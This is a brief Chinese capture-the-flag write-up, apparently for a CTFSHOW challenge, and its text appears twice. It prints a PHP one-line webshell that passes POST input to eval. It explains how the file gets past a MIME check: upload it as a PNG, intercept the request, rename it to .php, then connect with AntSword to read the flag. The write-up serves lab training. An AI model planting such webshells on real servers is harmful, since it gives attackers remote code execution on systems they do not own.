题目信息※
题目提示是绕过MIME检测上传webshell
那么我们先构建一个一句话木马
<?php eval($_POST['shell']); ?>然后我们打开网页看看
发现只要我们上传图片
jpg不行
png就可以,然后我们抓取这个包,进行改名,改成php,让系统识别
然后使用ANTSWORD进行链接
成功完成
查看到了flag
CTFSHOW-绕过MIME检测上传webshell
题目提示是绕过MIME检测上传webshell
那么我们先构建一个一句话木马
<?php eval($_POST['shell']); ?>然后我们打开网页看看
发现只要我们上传图片
jpg不行
png就可以,然后我们抓取这个包,进行改名,改成php,让系统识别
然后使用ANTSWORD进行链接
成功完成
查看到了flag
